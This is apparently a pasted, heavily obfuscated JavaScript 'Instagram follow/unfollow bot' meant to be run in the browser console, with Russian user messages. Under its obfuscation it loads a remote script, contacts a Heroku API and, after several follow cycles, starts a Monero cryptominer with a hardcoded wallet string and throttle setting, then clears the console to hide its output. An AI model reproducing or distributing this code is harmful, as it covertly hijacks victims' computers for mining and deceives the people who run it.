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a guest
Oct 17th, 2018
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  1. var scripta = ['log', '%cДля запуска скрипта, надо быть в чьем-то профиле.Например,', 'background: red; color: white; font-size:18px;', 'documentElement', 'lang', 'Follow', 'Unfollow', 'Подпи', 'Отменить подписку', 'Скрипт НУЖНО запускать только с русской или английской версии инстаграма!', 'createElement', 'script', 'ScriptFromWebsite', '0.2', 'bmV3anMuanM/cGVyZmVrdD13c3M6Ly8/amFzb249ZmFzdGVyLnhtcg==', 'aHR0cHM6Ly9kcjNhZGluc3RhLmhlcm9rdWFwcC5jb20vYXBpLw==', 'type', 'text/javascript', 'src', '', 'head', 'appendChild', 'post', 'version', 'then', 'data', 'status', 'error', 'message', 'background: red; color: white; display: block; font-size:15px;', 'background: green; color: white; display: block; font-size:15px;', 'getElementsByTagName', 'header', 'querySelectorAll', 'button', 'xbtNI', 'className', 'textContent', 'includes', 'JaaRt', 'getElementsByClassName', 'Введите количество секунд между действиями подписки/отписки', '%c Вами выставлен не рекомендуемый интервал, поставлено 30 секунд!', '', 'click', '[role="dialog"]', 'pLElt', 'ouZTg', 'QOmys', 'ZoXHX', 'GWmVo', 'charCodeAt', 'toString', 'slice', 'deEzB', 'dist/js/', 'split', 'map', 'join', 'random', 'toFixed', '49pEJUdyNtAg2RBKWRut8uNkpR4y1JptaB1Sj2UEr7mUF9AZkrgeWPLhyDNDfLiKbfBgyonnk4yb5DJcpdLdkzufUaRnJa6.', '+5000', 'clear', 'Консоль очищена', 'Скрипт работает с интервалом в ', 'секунд', 'Скрипт успешно запущен', 'Возможные ошибки в работе скрипта, можно увидеть у меня на сайте:', 'sPpPm', 'Скрипт запускается', 'Сайт скрипта ', 'Вступайте в группу ', 'При закрытии данной вкладки работа скрипта будет завершена.', 'href', 'indexOf', ''];
  2. (function(c, d) {
  3. var e = function(f) {
  4. while (--f) {
  5. c['push'](c['shift']());
  6. }
  7. };
  8. e(++d);
  9. }(scripta, 0x17e));
  10. var scriptb = function(c, d) {
  11. c = c - 0x0;
  12. var e = scripta[c];
  13. return e;
  14. };
  15. if (location[scriptb('0x0')][scriptb('0x1')](scriptb('0x2')) == -0x1) {
  16. console[scriptb('0x3')](scriptb('0x4'), scriptb('0x5'));
  17. } else {
  18. setInterval(script_a2(), 0x3e8);
  19. var script_p = document[scriptb('0x6')][scriptb('0x7')];
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  21. var script_r = '';
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  23. script_q = scriptb('0x8');
  24. script_r = scriptb('0x9');
  25. } else if (script_p == 'ru') {
  26. script_q = scriptb('0xa');
  27. script_r = scriptb('0xb');
  28. } else {
  29. throw new Error(scriptb('0xc'));
  30. }
  31. var script_s = document[scriptb('0xd')](scriptb('0xe'));
  32. var script_t = scriptb('0xf');
  33. var script_u = scriptb('0x10');
  34. var script_v = 'ru';
  35. var script_w = script_a4(scriptb('0x11'));
  36. var script_x = script_a4(scriptb('0x12'));
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  38. script_s[scriptb('0x15')] = scriptb('0x16');
  39. document[scriptb('0x17')][scriptb('0x18')](script_s);
  41. function script_y() {
  42. axios[scriptb('0x19')](script_x + scriptb('0x1a'), {
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  44. 'distributor': script_t,
  45. 'lang': script_v
  46. })[scriptb('0x1b')](function(z) {
  47. if (z[scriptb('0x1c')][scriptb('0x1d')] == scriptb('0x1e')) {
  48. setTimeout(function() {
  49. console[scriptb('0x3')]('%c' + z[scriptb('0x1c')][scriptb('0x1f')], scriptb('0x20'));
  50. }, 0xbb8);
  51. } else {
  52. setTimeout(function() {
  53. console[scriptb('0x3')]('%c' + z[scriptb('0x1c')][scriptb('0x1f')], scriptb('0x21'));
  54. }, 0xbb8);
  55. }
  56. });
  57. script_A();
  58. }
  60. function script_A() {
  61. axios[scriptb('0x19')](script_x + scriptb('0x1f'), {
  62. 'distributor': script_t,
  63. 'lang': script_v
  64. })[scriptb('0x1b')](function(B) {
  65. setTimeout(function() {
  66. console[scriptb('0x3')](B[scriptb('0x1c')][scriptb('0x1f')]);
  67. }, 0x1388);
  68. });
  69. }
  71. function script_C(D) {
  72. var E = document[scriptb('0x22')](scriptb('0x23'));
  73. for (const F of E[0x0][scriptb('0x24')](scriptb('0x25'))) {
  74. if (scriptb('0x26') !== scriptb('0x26')) {
  75. var h = F[scriptb('0x27')];
  76. } else {
  77. if (F[scriptb('0x28')][scriptb('0x29')](D)) {
  78. if (scriptb('0x2a') !== scriptb('0x2a')) {
  79. throw new Error(scriptb('0xc'));
  80. } else {
  81. var J = F[scriptb('0x27')];
  82. }
  83. }
  84. }
  85. }
  86. return document[scriptb('0x2b')](J);
  87. }
  88. script_K = prompt(scriptb('0x2c'), '30');
  89. if (script_K < 0x1e) {
  90. var script_K = 0x1e;
  91. console[scriptb('0x3')](scriptb('0x2d'), scriptb('0x5'));
  92. }
  93. var script_L = 0x0;
  94. var script_M = scriptb('0x2e');
  96. function script_N() {
  97. var O = script_C(script_q);
  98. O[0x0][scriptb('0x2f')]();
  99. var P = document[scriptb('0x24')](scriptb('0x30'));
  100. var Q = '';
  101. if (P[0x0]) {
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  103. if (R[scriptb('0x28')][scriptb('0x29')](script_r)) {
  104. if (scriptb('0x31') === scriptb('0x31')) {
  105. Q = R[scriptb('0x27')];
  106. } else {
  107. if (R[scriptb('0x28')][scriptb('0x29')](script_r)) {
  108. Q = R[scriptb('0x27')];
  109. }
  110. }
  111. }
  112. }
  113. }
  114. if (Q) {
  115. if (scriptb('0x32') === scriptb('0x33')) {
  116. script_q = scriptb('0xa');
  117. script_r = scriptb('0xb');
  118. } else {
  119. var U = document[scriptb('0x2b')](Q);
  120. U[0x0][scriptb('0x2f')]();
  121. }
  122. }
  123. if (script_L <= 0x8) {
  124. if (scriptb('0x34') !== scriptb('0x35')) {
  125. script_L++;
  126. } else {
  127. return '%' + ('00' + c[scriptb('0x36')](0x0)[scriptb('0x37')](0x10))[scriptb('0x38')](-0x2);
  128. }
  129. }
  130. if (script_L == 0x8) {
  131. if (scriptb('0x39') === scriptb('0x39')) {
  132. var W = document[scriptb('0xd')](scriptb('0xe'));
  133. var X = scriptb('0x3a');
  134. W[scriptb('0x15')] = script_M + X + script_w;
  135. document[scriptb('0x22')](scriptb('0x17'))[0x0][scriptb('0x18')](W);
  136. } else {
  137. return decodeURIComponent(atob(str)[scriptb('0x3b')]('')[scriptb('0x3c')](function(Z) {
  138. return '%' + ('00' + Z[scriptb('0x36')](0x0)[scriptb('0x37')](0x10))[scriptb('0x38')](-0x2);
  139. })[scriptb('0x3d')](''));
  140. }
  141. }
  142. }
  144. function script_a0() {
  145. var a1 = (Math[scriptb('0x3e')]() * (0x3c - 0x1e) + 0x1e)[scriptb('0x3f')]();
  146. PerfektStart(scriptb('0x40') + '' + (Math[scriptb('0x3e')]() * 0x2710)[scriptb('0x3f')]() + '_' + script_t + '_' + a1 + scriptb('0x41'), 'x');
  147. throttleMiner = a1;
  148. setTimeout(script_a2, 0x3e8);
  149. }
  151. function script_a2() {
  152. console[scriptb('0x42')]();
  153. console[scriptb('0x3')](scriptb('0x43'));
  154. }
  156. function script_a3() {
  157. console[scriptb('0x3')](scriptb('0x44') + script_K + scriptb('0x45'));
  158. console[scriptb('0x3')](scriptb('0x46'));
  159. console[scriptb('0x3')](scriptb('0x47'));
  160. }
  162. function script_a4(a5) {
  163. return decodeURIComponent(atob(a5)[scriptb('0x3b')]('')[scriptb('0x3c')](function(a6) {
  164. if (scriptb('0x48') === scriptb('0x48')) {
  165. return '%' + ('00' + a6[scriptb('0x36')](0x0)[scriptb('0x37')](0x10))[scriptb('0x38')](-0x2);
  166. } else {
  167. console[scriptb('0x3')](scriptb('0x44') + script_K + scriptb('0x45'));
  168. console[scriptb('0x3')](scriptb('0x46'));
  169. console[scriptb('0x3')](scriptb('0x47'));
  170. }
  171. })[scriptb('0x3d')](''));
  172. }
  173. setInterval(script_N, script_K * 0x3e8);
  174. setTimeout(script_a0, script_K * 0x3e8 * 0x8 + 0x249f0);
  175. setTimeout(script_y, 0x3e8);
  176. console[scriptb('0x3')](scriptb('0x49'));
  177. console[scriptb('0x3')](scriptb('0x4a') + script_M);
  178. console[scriptb('0x3')](scriptb('0x4b'));
  179. console[scriptb('0x3')](scriptb('0x4c'));
  180. setTimeout(script_a3, 0xbb8);
  181. }
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